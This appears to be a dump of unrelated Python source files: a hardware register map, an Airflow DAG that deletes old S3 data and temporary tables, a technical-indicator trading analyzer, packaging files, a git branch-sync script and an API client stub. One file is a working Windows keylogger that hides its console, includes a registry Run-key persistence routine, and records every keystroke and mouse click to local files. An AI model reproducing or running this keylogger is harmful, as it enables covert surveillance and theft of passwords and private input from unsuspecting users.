'out1_frequency': ((REG_SG_FREQ1_H, REG_SG_FREQ1_L),
to_reg_unsigned(0, 48, xform=lambda obj, f:f / _SG_FREQSCALE),
from_reg_unsigned(0, 48, xform=lambda obj, f: f * _SG_FREQSCALE)),
'out2_frequency': ((REG_SG_FREQ2_H, REG_SG_FREQ2_L),
to_reg_unsigned(0, 48, xform=lambda obj, f:f / _SG_FREQSCALE),
from_reg_unsigned(0, 48, xform=lambda obj, f: f * _SG_FREQSCALE)),
'out1_offset': (REG_SG_MODF1_H, to_reg_signed(0, 16, xform=lambda obj, o:o / obj._dac_gains()[0]),
from_reg_signed(0, 16, xform=lambda obj, o: o * obj._dac_gains()[0])),
'out2_offset': (REG_SG_MODF2_H, to_reg_signed(0, 16, xform=lambda obj, o:o / obj._dac_gains()[1]),
from_reg_signed(0, 16, xform=lambda obj, o: o * obj._dac_gains()[1])),
'out1_phase': (REG_SG_PHASE1, to_reg_unsigned(0, 32, xform=lambda obj, p: (p / _SG_PHASESCALE) % (2**32)),
from_reg_unsigned(0, 32, xform=lambda obj, p:p * _SG_PHASESCALE)),
'out2_phase': (REG_SG_PHASE2, to_reg_unsigned(0, 32, xform=lambda obj, p: (p / _SG_PHASESCALE) % (2**32)),
from_reg_unsigned(0, 32, xform=lambda obj, p:p * _SG_PHASESCALE)),
'out1_amplitude': (REG_SG_AMP1, to_reg_unsigned(0, 16, xform=lambda obj, a:a / obj._dac_gains()[0]),
from_reg_unsigned(0, 16, xform=lambda obj, a:a * obj._dac_gains()[0])),
'out2_amplitude': (REG_SG_AMP2, to_reg_unsigned(0, 16, xform=lambda obj, a:a / obj._dac_gains()[1]),
from_reg_unsigned(0, 16, xform=lambda obj, a:a * obj._dac_gains()[1])),
'out1_t0': (REG_SG_T01, to_reg_unsigned(0, 32, xform=lambda obj, o: o / _SG_TIMESCALE),
from_reg_unsigned(0, 32, xform=lambda obj, o: o * _SG_TIMESCALE)),
'out1_t1': (REG_SG_T11, to_reg_unsigned(0, 32, xform=lambda obj, o: o / _SG_TIMESCALE),
from_reg_unsigned(0, 32, xform=lambda obj, o: o * _SG_TIMESCALE)),
'out1_t2': (REG_SG_T21, to_reg_unsigned(0, 32, xform=lambda obj, o: o / _SG_TIMESCALE) ,
from_reg_unsigned(0, 32, xform=lambda obj, o: o * _SG_TIMESCALE)),
'out2_t0': (REG_SG_T02, to_reg_unsigned(0, 32, xform=lambda obj, o: o / _SG_TIMESCALE),
from_reg_unsigned(0, 32, xform=lambda obj, o: o * _SG_TIMESCALE)),
'out2_t1': (REG_SG_T12, to_reg_unsigned(0, 32, xform=lambda obj, o: o / _SG_TIMESCALE),
from_reg_unsigned(0, 32, xform=lambda obj, o: o * _SG_TIMESCALE )),
'out2_t2': (REG_SG_T22, to_reg_unsigned(0, 32, xform=lambda obj, o: o / _SG_TIMESCALE ),
from_reg_unsigned(0, 32, xform=lambda obj, o: o * _SG_TIMESCALE )),
'out1_riserate': ((REG_SG_RFRATE1_H, REG_SG_RISERATE1_L),
to_reg_unsigned(0, 48, xform=lambda obj, r: r / _SG_FREQSCALE),
from_reg_unsigned(0, 48, xform=lambda obj, r: r * _SG_FREQSCALE)),
'out1_fallrate': ((REG_SG_RFRATE1_H, REG_SG_FALLRATE1_L),
lambda obj, f, old: ((old[0] & 0x0000FFFF) | (_usgn(f/_SG_FREQSCALE, 48) >> 16) & 0xFFFF0000, _usgn(f/_SG_FREQSCALE, 48) & 0xFFFFFFFF),
lambda obj, rval: _SG_FREQSCALE * ((rval[0] & 0xFFFF0000) << 16 | rval[1])),
'out2_riserate': ((REG_SG_RFRATE2_H, REG_SG_RISERATE2_L),
to_reg_unsigned(0, 48, xform=lambda obj, r: r / _SG_FREQSCALE),
from_reg_unsigned(0, 48, xform=lambda obj, r: r * _SG_FREQSCALE)),
'out2_fallrate': ((REG_SG_RFRATE2_H, REG_SG_FALLRATE2_L),
lambda obj, f, old: ((old[0] & 0x0000FFFF) | (_usgn(f/_SG_FREQSCALE, 48) >> 16) & 0xFFFF0000, _usgn(f/_SG_FREQSCALE, 48) & 0xFFFFFFFF),
lambda obj, rval: _SG_FREQSCALE * ((rval[0] & 0xFFFF0000) << 16 | rval[1])),
'out1_amp_pc': (REG_SG_PRECLIP, to_reg_unsigned(0, 16, xform=lambda obj, a: a / obj._dac_gains()[0]),
from_reg_unsigned(0, 16, xform=lambda obj, a: a * obj._dac_gains()[0])),
'out2_amp_pc': (REG_SG_PRECLIP, to_reg_unsigned(16, 16, xform=lambda obj, a: a / obj._dac_gains()[1]),
from_reg_unsigned(16, 16, xform=lambda obj, a: a * obj._dac_gains()[1])),
'internal_trig_increment_ch1': ((REG_SG_TrigPeriodInternalCH0_H, REG_SG_TrigPeriodInternalCH0_L),
to_reg_unsigned(0,64), from_reg_unsigned(0,64)),
'internal_trig_increment_ch2': ((REG_SG_TrigPeriodInternalCH1_H, REG_SG_TrigPeriodInternalCH1_L),
to_reg_unsigned(0,64), from_reg_unsigned(0,64)),
'internal_trig_dutytarget_ch1': ((REG_SG_TrigDutyInternalCH0_H, REG_SG_TrigDutyInternalCH0_L),
to_reg_unsigned(0,64), from_reg_unsigned(0,64)),
'internal_trig_dutytarget_ch2': ((REG_SG_TrigDutyInternalCH1_H, REG_SG_TrigDutyInternalCH1_L),
to_reg_unsigned(0,64), from_reg_unsigned(0,64)),
'trig_ADC_threshold_ch1': (REG_SG_ADCThreshold, to_reg_signed(0,12), from_reg_signed(0,12)),
'trig_ADC_threshold_ch2': (REG_SG_ADCThreshold, to_reg_signed(12,12), from_reg_signed(12,12)),
'trig_DAC_threshold_ch1': (REG_SG_DACThreshold, to_reg_signed(0,16), from_reg_signed(0,16)),
'trig_DAC_threshold_ch2': (REG_SG_DACThreshold, to_reg_signed(16,16), from_reg_signed(16,16)),
'trig_sweep_mode_ch1': (REG_SG_TrigSweepMode, to_reg_unsigned(0,3), from_reg_unsigned(0,3)),
'trig_sweep_mode_ch2': (REG_SG_TrigSweepMode, to_reg_unsigned(3,3), from_reg_unsigned(3,3)),
'trigger_select_ch1': (REG_SG_TrigSweepMode, to_reg_unsigned(6,2), from_reg_unsigned(6,2)),
'trigger_select_ch2': (REG_SG_TrigSweepMode, to_reg_unsigned(8,2), from_reg_unsigned(8,2)),
'sweep_length_ch1': ((REG_SG_SweepLengthCh0_H, REG_SG_SweepLengthCh0_L),
to_reg_unsigned(0,64), from_reg_unsigned(0,64)),
'sweep_length_ch2': ((REG_SG_SweepLengthCh1_H, REG_SG_SweepLengthCh1_L),
to_reg_unsigned(0,64), from_reg_unsigned(0,64)),
'sweep_init_freq_ch1': ((REG_SG_SweepInitFreqCh0_H, REG_SG_SweepInitFreqCh0_L),
to_reg_unsigned(0,48), from_reg_unsigned(0,48)),
'sweep_init_freq_ch2': ((REG_SG_SweepInitFreqCh1_H, REG_SG_SweepInitFreqCh1_L),
to_reg_unsigned(0,48), from_reg_unsigned(0,48)),
'sweep_increment_ch1': ((REG_SG_SweepIncrementCh0_H, REG_SG_SweepIncrementCh0_L),
to_reg_signed(0,64), from_reg_signed(0,64)),
'sweep_increment_ch2': ((REG_SG_SweepIncrementCh1_H, REG_SG_SweepIncrementCh1_L),
to_reg_signed(0,64), from_reg_signed(0,64)),
'ncycles_period_ch1': ((REG_SG_NCycles_TrigDutyCH0_H, REG_SG_NCycles_TrigDutyCH0_L),
to_reg_unsigned(0,64), from_reg_unsigned(0,64)),
'ncycles_period_ch2': ((REG_SG_NCycles_TrigDutyCH1_H, REG_SG_NCycles_TrigDutyCH1_L),
to_reg_unsigned(0,64), from_reg_unsigned(0,64)),
'adc1_statuslight': (REG_SG_MODSOURCE, to_reg_unsigned(5, 1),
from_reg_unsigned(5, 1)),
'adc2_statuslight': (REG_SG_MODSOURCE, to_reg_unsigned(6, 1),
from_reg_unsigned(6, 1))
}
|
StarcoderdataPython
|
9712414
|
<reponame>akumuthan-dev/data-flow
import re
from datetime import datetime, timedelta
from functools import partial
from airflow import DAG
from airflow.hooks.S3_hook import S3Hook
from airflow.hooks.postgres_hook import PostgresHook
from airflow.operators.python_operator import PythonOperator
import sqlalchemy as sa
from dataflow import config
from dataflow.utils import logger, slack_alert
def cleanup_old_s3_files(*args, **kwargs):
s3 = S3Hook("DEFAULT_S3")
bucket = s3.get_bucket(config.S3_IMPORT_DATA_BUCKET)
current_time = datetime.strptime(kwargs["ts_nodash"], "%Y%m%dT%H%M%S")
logger.info(
f"Retention period is {config.S3_RETENTION_PERIOD_DAYS} days before {current_time}"
)
pipelines = s3.list_prefixes(
config.S3_IMPORT_DATA_BUCKET, prefix="import-data/", delimiter="/"
)
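    # Each prefix has the form "import-data/<pipeline>/", with one sub-prefix per
    # run named by its timestamp, e.g. ".../20200407T000000/" (layout inferred
    # from the strptime call below).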
for pipeline in pipelines:
run_ids = sorted(
s3.list_prefixes(
config.S3_IMPORT_DATA_BUCKET, prefix=pipeline, delimiter="/"
)
)
for run_id in run_ids:
run_dt = datetime.strptime(run_id.split("/")[-2], "%Y%m%dT%H%M%S")
if run_id == run_ids[-1]:
logger.info(
f"Keeping {pipeline} run {run_id} ({run_dt}) - always retain the last run."
)
elif current_time - run_dt >= timedelta(
days=config.S3_RETENTION_PERIOD_DAYS
):
logger.info(
f"Deleting {pipeline} run {run_id} ({run_dt}) older than retention period"
)
bucket.objects.filter(Prefix=run_id).delete()
else:
logger.info(f"Keeping {pipeline} run {run_id} ({run_dt})")
def cleanup_old_datasets_db_tables(*args, **kwargs):
engine = sa.create_engine(
'postgresql+psycopg2://',
creator=PostgresHook(postgres_conn_id=config.DATASETS_DB_NAME).get_conn,
)
current_time = datetime.strptime(kwargs["ts_nodash"], "%Y%m%dT%H%M%S")
logger.info(
f"Retention period is {config.DB_TEMP_TABLE_RETENTION_PERIOD_DAYS} days before {current_time}"
)
with engine.begin() as conn:
tables = [
table
for table in conn.execute(
'''
SELECT schemaname, tablename
FROM pg_catalog.pg_tables
WHERE schemaname NOT IN ('dataflow', 'information_schema')
AND schemaname NOT LIKE '\\_%%'
AND schemaname NOT LIKE 'pg_%%'
'''
)
]
for table in tables:
schema, table_name = table
table_match = re.match(r"(.*)_(\d{8}t\d{6})(?:_swap)?", table_name)
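            # Matches temporary tables such as "dataset_20200407t000000" and
            # "dataset_20200407t000000_swap", capturing the base table name and
            # the run timestamp.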
if not table_match:
logger.info(f"Skipping {schema}.{table_name}")
continue
table_dt = datetime.strptime(table_match.groups()[1], "%Y%m%dt%H%M%S")
if current_time - table_dt >= timedelta(
days=config.DB_TEMP_TABLE_RETENTION_PERIOD_DAYS
):
if table_match.groups()[0] not in [table[1] for table in tables]:
logger.warning(
f"Main table {table_match.groups()[0]} missing for {schema}.{table_name}, skipping"
)
else:
logger.info(
f"Deleting temporary table {schema}.{table_name} ({table_dt}) older than retention period"
)
conn.execute(
"DROP TABLE {}.{}".format(
engine.dialect.identifier_preparer.quote(schema),
engine.dialect.identifier_preparer.quote(table_name),
)
)
else:
logger.info(f"Keeping table {schema}.{table_name}")
dag = DAG(
"Maintenance",
catchup=False,
start_date=datetime(2020, 4, 7),
schedule_interval="@daily",
on_failure_callback=partial(slack_alert, success=False),
)
dag << PythonOperator(
task_id='clean-up-s3', python_callable=cleanup_old_s3_files, provide_context=True
)
dag << PythonOperator(
task_id='clean-up-datasets-db',
python_callable=cleanup_old_datasets_db_tables,
provide_context=True,
)
|
StarcoderdataPython
|
11302981
|
__author__ = "<NAME>"
import pythoncom
import pyHook
import os, sys
from _winreg import *
buffer = []
#Hide
def hide():
import win32console, win32gui
window = win32console.GetConsoleWindow()
win32gui.ShowWindow(window, 0)
return True
# Add to startup
def addStartup():
fp=os.path.dirname(os.path.realpath(__file__))
file_name=sys.argv[0].split("\\")[-1]
new_file_path=fp+"\\"+file_name
keyVal= r'Software\Microsoft\Windows\CurrentVersion\Run'
key2change= OpenKey(HKEY_CURRENT_USER,keyVal,0,KEY_ALL_ACCESS)
SetValueEx(key2change, "The_Watch",0,REG_SZ, new_file_path)
def OnKeyboardEvent(event):
with open("gold.txt", "a") as writer:
if event.KeyID != 13:
buffer.append(chr(event.Ascii))
writer.write(chr(event.Ascii))
if event.KeyID == 8:
buffer.append("BackSpace")
writer.write("BackSpace")
elif event.KeyID == 13:
buffer.append("\n")
with open("bufferTXT.txt", 'a') as buffwritter:
buffwritter.writelines(buffer)
del buffer[:]
return True
def onClick(event):
with open("gold.txt", "a") as writer:
mouseClick = event.Position
writer.write("\n"+str(mouseClick))
return True
hide()
#addStartup()
manager = pyHook.HookManager()
manager.KeyDown = OnKeyboardEvent
manager.HookKeyboard()
manager.SubscribeMouseAllButtonsDown(onClick)
manager.HookMouse()
pythoncom.PumpMessages()
manager.UnhookMouse()
manager.UnhookKeyboard()
|
StarcoderdataPython
|
4987973
|
<gh_stars>0
import sys
import random
from datetime import datetime
import matplotlib.pyplot as plt
import numpy as np
import talib as ta
#list of functions
#print ta.get_functions()
#print ta.get_function_groups()
#https://github.com/mrjbq7/ta-lib
#http://www.eickonomics.com/posts/2014-03-25-python-vs-R-adding-TA-
#indicators/
import config as cfg
from misc import msg
class Analyze(object):
def __init__(self, symbol, date, weights):
self.symbol = symbol
self.date = date
self.price = 0.0
self.evaluation = 0.0
self.indicator_listing = ['macd', 'bollinger', 'rsi', 'obv']
self.indicators = self.init_indicators()
if weights:
self.weights = weights
else:
self.weights = self.init_indicators(val=1.0)
self.get_data()
if self.data.size > 0:
self.calc_indicators()
self.evaluate()
def get_data(self):
#query all dates before self.date
query = cfg.db.cur.execute(
'select Date,AdjClose,Volume from %s' % self.symbol)
query = cfg.db.cur.fetchall()
data = []
for item in query:
if (datetime.strptime(item[0], '%Y-%m-%d')
<= datetime.strptime(self.date, '%Y-%m-%d')):
if item[1] != 'null':
data.append(item)
else:
break
self.data = np.asarray(data)
#just pass if no data
if not data:
return
#unpack data
self.price = float(data[-1][1]) if len(data) > 0 else 0.0
self.indicators['date'] = np.asarray([datetime.strptime(x,
'%Y-%m-%d') for x in self.data[:, 0]])
self.indicators['price'] = np.asarray([float(x)
for x in self.data[:, 1]])
self.indicators['volume'] = np.asarray([float(x)
for x in self.data[:, 2]])
def init_indicators(self, val=0.0):
indicators = {}
for indicator in self.indicator_listing:
indicators[indicator] = val
return indicators
def calc_indicators(self):
#horizontal line data useful for plotting
self.indicators['zero'] = np.asarray([0.0 for _ in
self.indicators['price']])
self.indicators['fifty'] = np.asarray([50.0 for _ in
self.indicators['price']])
#macd
#macddiff = 12ema - 26ema
#macdsignal = 9ema of macd
#macdhist = macd - signal
macd_ind, macd_signal, macd_hist = ta.MACD(self.indicators['price'],
fastperiod=12, slowperiod=26, signalperiod=9)
self.indicators['macd_ind'] = macd_ind
self.indicators['macd_signal'] = macd_signal
self.indicators['macd_hist'] = macd_hist
#macd signal crossover
if len(macd_ind) > 33: #need 34 days of prices
today = macd_ind[-1] - macd_signal[-1]
yesterday = macd_ind[-2] - macd_signal[-2]
#macd crosses above signal --> buy
if today > 0 and yesterday < 0:
self.indicators['macd'] = 1.0
#macd crosses below signal --> sell
elif today < 0 and yesterday > 0:
self.indicators['macd'] = -1.0
#other indicators
#price diverges from macd --> end of current trend
#macd rises dramatically --> overbought and will return normal
#macd above zero --> upward momentum
#macd below zero --> downward momentum
#calc bollinger bands
#middle = 21sma
upper, middle, lower = ta.BBANDS(self.indicators['price'],
timeperiod=5, nbdevup=2, nbdevdn=2, matype=0)
self.indicators['bollinger_upper'] = upper
self.indicators['bollinger_middle'] = middle
self.indicators['bollinger_lower'] = lower
#FIXME: set number [-1,1] for buy, sell
self.indicators['bollinger'] = 0.0
#calc rsi
rsi = ta.RSI(self.indicators['price'], timeperiod=14)
self.indicators['rsi_ind'] = rsi
#FIXME: convert to [-1,1] for sell, buy
self.indicators['rsi'] = 0.0
#calc on-balance volume
#obv = prev volume + change in volume
#FIXME: plot messed up but numbers are fine
obv = ta.OBV(self.indicators['price'], self.indicators['volume'])
self.indicators['obv_ind'] = obv
#FIXME: convert to [-1,1] for sell, buy
self.indicators['obv'] = 0.0
#calc ema
ema12 = ta.EMA(self.indicators['price'], timeperiod=12)
ema26 = ta.EMA(self.indicators['price'], timeperiod=26)
self.indicators['ema12'] = ema12
self.indicators['ema26'] = ema26
#debug plot
#window = 0
#self.plot(['volume', 'obv'], days=window)
#self.plot(['fifty', 'rsi'], days=window)
#self.plot(['zero', 'macd_ind', 'macd_signal'], days=100)
#self.plot(['price', 'ema12', 'ema26'], days=window)
#self.plot(['price', 'upperbb', 'middlebb','lowerbb'], days=window)
#sys.exit()
def evaluate(self):
evaluation = 0.0
for key in self.indicator_listing:
evaluation += self.indicators[key] * self.weights[key]
self.evaluation = evaluation
#random evaluation
if cfg.random_trades:
scalar = 1 if random.random() < 0.5 else -1
self.evaluation = scalar * random.random()
def plot(self, keys, days=0):
#FIXME: https://stackoverflow.com/questions/9673988/intraday-candlestick-charts-using-matplotlib
#BETTER FIXME: https://www.quantopian.com/posts/plot-candlestick-charts-in-research
for key in keys:
y = self.indicators[key][-days:-1]
x = self.indicators['date'][-days:-1]
if key == 'price' or key == 'zero' or key == 'volume':
plt.plot(x, y,'b-', color='black', label=key)
else:
plt.plot(x, y,'-', label=key)
plt.title('daily chart %s' % self.symbol)
plt.xlabel('date')
plt.ylabel('price')
plt.legend(loc='best')
plt.show()
#chooses symbol based on evaluation
def best_eval(evals):
choices = []
for symbol in evals:
if not evals[symbol].data.size > 0: #no nflx data until 2002
continue
if abs(evals[symbol].evaluation) > cfg.eval_threshold:
choices.append(evals[symbol])
#FIXME: sort by bigger absolute val of eval then by cheaper price
return choices
def pick_trade(choice):
min_buypower = cfg.minshares * choice.price + 2 * cfg.commission
min_sellpower = cfg.commission
buypower = cfg.api.account_buypower()
shares = int(buypower / choice.price)
position = cfg.api.account_positions()[choice.symbol][0]
#debug print reason for no trade
if choice.evaluation > 0:
print ' BUYING: %s' % choice.symbol
if choice.evaluation <= cfg.eval_threshold:
print ' NO BUY: eval below threshold %s' % (
cfg.eval_threshold,)
if buypower <= min_buypower:
print ' NO BUY: not enough buypower %s < %s' % (buypower,
min_buypower)
if position > 0:
print ' NO BUY: already holding a position'
if choice.evaluation < 0:
print ' SELLING: %s' % choice.symbol
        if choice.evaluation >= -cfg.eval_threshold:
print ' NO SELL: eval below threshold %s' % (
cfg.eval_threshold,)
if buypower <= min_sellpower:
print ' NO SELL: not enough sellpower %s < %s' % (
buypower, min_sellpower)
if position <= 0:
print ' NO SELL: no shares to sell'
#buy
if (choice.evaluation > cfg.eval_threshold
and buypower > min_buypower and position <= 0):
return (choice.symbol, choice.price, shares)
#sell
elif (choice.evaluation < cfg.eval_threshold
and buypower > min_sellpower and position > 0):
return (choice.symbol, choice.price, -shares)
#do nothing
return (choice.symbol, choice.price, 0.0)
|
StarcoderdataPython
|
74663
|
<filename>make_demo_discover_rt/pysequitur/__init__.py<gh_stars>10-100
#!/usr/local/bin/python
# -*- coding: utf-8 -*-
# file: __init__.py
from .main import Sequencer, Sequencer2, print_grammar, AlphabetsTransformer
"""
exporting:
- Sequencer
- Sequencer2
- print_grammar
"""
|
StarcoderdataPython
|
11255917
|
<gh_stars>1-10
#!/usr/bin/env python3
from setuptools import setup
setup(
name="wisdom",
version="2.1",
description="A collection of wise quotes for the terminal",
long_description=open("README.md").read(),
license="MIT",
packages=["libwisdom"],
scripts=["wisdom"],
package_data={"libwisdom": ["data/*"]},
)
|
StarcoderdataPython
|
1708720
|
import numpy as np
import keras
from keras.models import Sequential
from keras.layers import Dense
from keras.layers import Conv2D
from keras.layers import MaxPooling2D
from keras.layers import Flatten
import robolib.robogui.pixel_editor as pe
import cv2
import robolib.images.feature_extraction as extr
DEBUG = True
label_labels = ["O", "X"]
labels = np.random.randint(0, 2, size=(1000, 1))
size = 9
data = np.zeros(shape=(1000, size, size, 1))
for la, d in zip(labels, data):
img = np.empty((size, size))
img.fill(-1)
if la == 0:
cv2.ellipse(img, (4, 4), (np.random.randint(2, 5), np.random.randint(2, 5)), 0, 360, 0, 1)
else:
randPointStart = np.random.randint(0, 16)
randPointEnd = np.random.randint(0, 16)
cv2.line(img, (int(randPointStart / 4), randPointStart % 4), (8 - int(randPointEnd / 4), 8 - randPointEnd % 4), 1)
randPointStart = np.random.randint(0, 16)
randPointEnd = np.random.randint(0, 16)
cv2.line(img, (8 - int(randPointStart / 4), randPointStart % 4), (int(randPointEnd / 4), 8 - randPointEnd % 4), 1)
img = extr.resize_image_to_info(img, size, size)
d[:, :, :] = np.reshape(img, (size, size, 1))
if DEBUG:
if pe.show_image(img):
DEBUG = False
model = Sequential()
model.add(Conv2D(9, (3, 3), activation='relu', input_shape=(size, size, 1)))
model.add(Conv2D(9, (3, 3), activation='relu'))
model.add(MaxPooling2D((2, 2), (2, 2)))
# model.add(Conv2D(3, (3, 3), activation='relu'))
# model.add(MaxPooling2D((2, 2), (2, 2)))
model.add(Flatten())
model.add(Dense(9, activation='relu'))
model.add(Dense(2, activation='relu'))
model.add(Dense(2, activation='softmax'))
model.compile(optimizer='rmsprop',
loss='categorical_crossentropy',
metrics=['accuracy'])
tbCallback = keras.callbacks.TensorBoard(log_dir="./logs", write_images=True)
one_hot_labels = keras.utils.to_categorical(labels, num_classes=2)
model.fit(data, one_hot_labels, epochs=250, batch_size=80, callbacks=[tbCallback])
while True:
predict_data = pe.get_drawing_input(size, size, size*3, size*3)
if all(1.0 not in row for row in predict_data):
break
# if DEBUG:
pe.show_image(predict_data)
output = model.predict(np.array([predict_data]), 1, 3)
if all(all(n < 0.9 for n in m) for m in output):
print("Don't know, will guess: ")
print(label_labels[np.argmax(output)])
if DEBUG:
print(np.around(output, 5))
|
StarcoderdataPython
|
319783
|
<reponame>Liu-JiaTong/DataEngine
import pandas as pd
from fbprophet import Prophet
import matplotlib.pyplot as plt
get_ipython().run_line_magic('matplotlib', 'inline')
# Read in the dataset
df = pd.read_csv('./DataSet/train.csv')
# Fit the model
model = Prophet(yearly_seasonality=True, seasonality_prior_scale=0.1)
model.fit(df)
# Build the dataframe of dates to forecast, seven months ahead
future = model.make_future_dataframe(periods=213)
# Forecast over the extended dataset
forecast = model.predict(future)
# Plot the forecast results
model.plot(forecast)
plt.show()
|
StarcoderdataPython
|
5126501
|
while True:
n = int(input('Quer ver a tabuada de qual valor? '))
print('-'*35)
    if n < 0:  # Show the times table until the user enters a negative value
break
    for i in range(0, 11):  # When the step is just 1, the 1 can be omitted
print(f'{n} X {i} = {n*i}')
print('-'*35)
print('Tabuada Encerrada. Volte Sempre!')
|
StarcoderdataPython
|
3505754
|
# Python RPG
# <NAME>
# https://github.com/AlexGalhardo/Python-RPG
# <EMAIL>
# https://alexgalhardo.com
# !/usr/bin/python3
# coding: utf-8
# ./Python/Monsters/PitsOfInferno_Monsters/Bear.py
from SuperClass.NormalMonster import NormalMonster
from Global.GLOBAL_PITS_OF_INFERNO_VARIABLES import GLOBAL_BEAR_LIFE, \
GLOBAL_BEAR_NAME, \
GLOBAL_BEAR_WEAPON_ATTACK, \
GLOBAL_BEAR_EXPERIENCE
class Bear(NormalMonster):
    '''
    -- Inherited from LivingBeing
    self.livingBeingtotalLife
    self.livingBeingCurrentlyLife
    def setLiveBeingTotalLife(totalLife)
    def getLiveBeingTotalLife(): int
    '''
    '''
    -- Inherited from NormalMonster
    self.normalMonsterSpellDamage = normalMonsterSpellDamage
    self.normalMonsterName = normalMonsterName
    self.normalMonsterExperienceForKill = normalMonsterExperienceForKill
    self.lootGoldCoins = randint(100, 500)
    '''
def __init__(self):
# constructor Normal Monster
super().__init__( GLOBAL_BEAR_LIFE,
GLOBAL_BEAR_NAME,
GLOBAL_BEAR_WEAPON_ATTACK,
GLOBAL_BEAR_EXPERIENCE )
|
StarcoderdataPython
|
3245063
|
from typing import List
def ref_range_to_refs(ref_range: str) -> List[str]:
"""
Given a ref range like eg ibr152-ibr155
returns a list of the individual refs, eg
[ibr152,ibr153,ibr154,ibr155]
assumptions:
- always comprises alphabetic then number
- alphabetic bit always constant
- number always same number of digits
- only two refs in range, separated by '-'
"""
prefix = ''
prefix_length = 0
left, right = ref_range.split('-')
assert len(left) == len(right)
while prefix_length < len(left) and left[prefix_length] == right[prefix_length]:
prefix_length += 1
prefix = left[:prefix_length]
start = int(left[prefix_length:])
numeric_length = len(left) - prefix_length
end = int(right[prefix_length:])
refs = [prefix + str(idx).rjust(numeric_length, '0') for idx in range(start, end + 1)]
return refs
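

# Minimal sanity check of the behavior described in the docstring
# (the refs below are the hypothetical ones from that example):
if __name__ == '__main__':
    assert ref_range_to_refs('ibr152-ibr155') == ['ibr152', 'ibr153', 'ibr154', 'ibr155']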
|
StarcoderdataPython
|
125750
|
<reponame>ganadist/r8
#!/usr/bin/env python
# Copyright (c) 2019, the R8 project authors. Please see the AUTHORS file
# for details. All rights reserved. Use of this source code is governed by a
# BSD-style license that can be found in the LICENSE file.
# Script that automatically pulls and uploads all upstream direct and indirect
# branches into the current branch.
#
# Example:
#
# $ git branch -vv
# * feature_final xxxxxxxxx [feature_prereq_c: ...] ...
# feature_prereq_c xxxxxxxxx [feature_prereq_b: ...] ...
# feature_prereq_b xxxxxxxxx [feature_prereq_a: ...] ...
# feature_prereq_a xxxxxxxxx [master: ...] ...
# master xxxxxxxxx [origin/master] ...
#
# Executing `git_sync_cl_chain.py -m <message>` causes the following chain of
# commands to be executed:
#
# $ git checkout feature_prereq_a; git pull; git cl upload -m <message>
# $ git checkout feature_prereq_b; git pull; git cl upload -m <message>
# $ git checkout feature_prereq_c; git pull; git cl upload -m <message>
# $ git checkout feature_final; git pull; git cl upload -m <message>
import optparse
import os
import sys
import defines
import utils
REPO_ROOT = defines.REPO_ROOT
class Repo(object):
def __init__(self, name, is_current, upstream):
self.name = name
self.is_current = is_current
self.upstream = upstream
def ParseOptions(argv):
result = optparse.OptionParser()
result.add_option('--message', '-m', help='Message for patchset')
result.add_option('--rebase',
help='To use `git pull --rebase` instead of `git pull`',
action='store_true')
result.add_option('--no_upload', '--no-upload',
help='Disable uploading to Gerrit', action='store_true')
(options, args) = result.parse_args(argv)
options.upload = not options.no_upload
assert options.message, 'A message for the patchset is required.'
assert len(args) == 0
return options
def main(argv):
options = ParseOptions(argv)
rebase_args = ['--rebase'] if options.rebase else []
with utils.ChangedWorkingDirectory(REPO_ROOT, quiet=True):
branches = [
parse(line)
for line in utils.RunCmd(['git', 'branch', '-vv'], quiet=True)]
current_branch = None
for branch in branches:
if branch.is_current:
current_branch = branch
break
assert current_branch is not None
if current_branch.upstream == None:
print('Nothing to sync')
return
stack = []
while current_branch:
stack.append(current_branch)
if current_branch.upstream is None or current_branch.upstream == 'master':
break
current_branch = get_branch_with_name(current_branch.upstream, branches)
while len(stack) > 0:
branch = stack.pop()
print('Syncing ' + branch.name)
utils.RunCmd(['git', 'checkout', branch.name], quiet=True)
utils.RunCmd(['git', 'pull'] + rebase_args, quiet=True)
if options.upload:
utils.RunCmd(['git', 'cl', 'upload', '-m', options.message], quiet=True)
utils.RunCmd(['git', 'cl', 'issue'])
def get_branch_with_name(name, branches):
for branch in branches:
if branch.name == name:
return branch
return None
# Parses a line from the output of `git branch -vv`.
#
# Example output ('*' denotes the current branch):
#
# $ git branch -vv
# * feature_final xxxxxxxxx [feature_prereq_c: ...] ...
# feature_prereq_c xxxxxxxxx [feature_prereq_b: ...] ...
# feature_prereq_b xxxxxxxxx [feature_prereq_a: ...] ...
# feature_prereq_a xxxxxxxxx [master: ...] ...
# master xxxxxxxxx [origin/master] ...
def parse(line):
is_current = False
if line.startswith('*'):
is_current = True
line = line[1:].lstrip()
else:
line = line.lstrip()
name_end_index = line.index(' ')
name = line[:name_end_index]
line = line[name_end_index:].lstrip()
if ('[') not in line or ':' not in line:
return Repo(name, is_current, None)
upstream_start_index = line.index('[')
line = line[upstream_start_index+1:]
upstream_end_index = line.index(':')
upstream = line[:upstream_end_index]
return Repo(name, is_current, upstream)
if __name__ == '__main__':
sys.exit(main(sys.argv[1:]))
|
StarcoderdataPython
|
6606929
|
import sys
import os
import requests
class Client(object):
"""A simple API client for the Xray's API.
see README for more details
"""
tests_name = []
test_suites = []
#last_update = 89
def __init__(self, api_token=None, url_base=""):
self.api_token = api_token
self.vars = "" #["startUrl" : "http://google.com",... ]
self.url_base = url_base
###
def _request(self, path, parameters=None):
data = requests.get("%s%s?apiKey=%s" % (self.url_base, path, self.api_token))
print("%s%s?apiKey=%s" % (self.url_base, path, self.api_token))
return data.json()
###EXTRAS
def get_id_by_test_name(self, testid):
"""
"""
response = self._request("tests/<testId>/")
print(response)
return response
def get_test_by_name(self, test_name):
"""
"""
id = self.get_id_by_test_name(test_name)
self.get_test_by_id(id)
response = self._request("tests/<testId>/")
print(response)
return response
###TESTS
    def get_test_by_id(self, testid):
        """
        """
        response = self._request("tests/%s/" % testid)
        print(response)
        return response
def get_tests(self):
"""
"""
response = self._request("tests/")
print(response)
return response
###TESTS_SUITES
def get_test_suites(self):
"""
"""
response = self._request("tests/")
print(response)
return response
def get_test_suite(self):
"""
"""
response = self._request("tests/")
print(response)
return response
###TESTS_RESULTS
def get_suite_results_by_results_id(self, id):
"""
"""
print("get_test_results")
response = self._request("tests/")
print(response)
return response
def get_results_id(self, id):
"""
"""
print("get_test_results")
response = self._request("tests/")
print(response)
return response
###TESTS_EXUCUTIONS
def run_test(self):
"""
"""
response = self._request("tests/")
print(response)
return response
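

# Hypothetical usage; the base URL and key below are placeholders, not a real endpoint:
if __name__ == "__main__":
    client = Client(api_token="YOUR_API_KEY", url_base="https://xray.example.com/api/")
    client.get_tests()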
|
StarcoderdataPython
|
9694811
|
<reponame>SmartDataAnalytics/KEEN-Preprocessor<filename>src/kupp/instance_creation_utils/utils.py
